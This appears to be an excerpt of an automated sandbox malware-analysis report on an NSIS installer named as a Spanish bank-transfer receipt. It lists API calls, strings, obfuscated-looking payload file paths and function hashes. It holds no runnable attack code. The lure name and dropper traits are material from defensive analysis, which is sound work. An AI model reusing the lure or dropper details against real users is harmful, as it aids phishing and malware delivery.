                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                            • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                            • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                            • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                            • MulDiv.KERNEL32(000C1D1C,00000064,000C3838), ref: 00402D4D
                                            • wsprintfW.USER32 ref: 00402D5D
                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402D57
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                            • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                            • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                            • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 10002416
                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                            • String ID:
                                            • API String ID: 4216380887-0
                                            • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                            • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                            • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                            • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                            • GlobalFree.KERNEL32(?), ref: 10002572
                                            • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                            • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                            • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                            • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
                                            • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                            • Opcode Fuzzy Hash: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
                                            • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                            • wsprintfW.USER32 ref: 004049DF
                                            • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$&B
                                            • API String ID: 3540041739-2907463167
                                            • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                            • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                            • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                            • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp$C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll
                                            • API String ID: 3109718747-1318223775
                                            • Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                            • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                            • Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                            • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                            • String ID:
                                            • API String ID: 1148316912-0
                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                            • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                            • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                            • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDC.USER32(?), ref: 00401D59
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                            • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                            • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                            • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                            • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                              • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                              • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                              • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                            • lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                            • GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                            • API String ID: 3248276644-1197487810
                                            • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                            • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                            • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                            • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                            • CharNextW.USER32(00000000), ref: 00405A8C
                                            • CharNextW.USER32(00000000), ref: 00405AA4
                                            Strings
                                            • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                            • API String ID: 3213498283-4087429501
                                            • Opcode ID: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                            • Instruction ID: 2b58bc667f998461ca91ac7b18547026c13bd309f09f4c7a6bbb9f4139172dd1
                                            • Opcode Fuzzy Hash: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                            • Instruction Fuzzy Hash: 09F09611B10B1295DB3276544CC5A7766BCEF94361F14823BE501B72C0E3FC48818FEA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                            • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
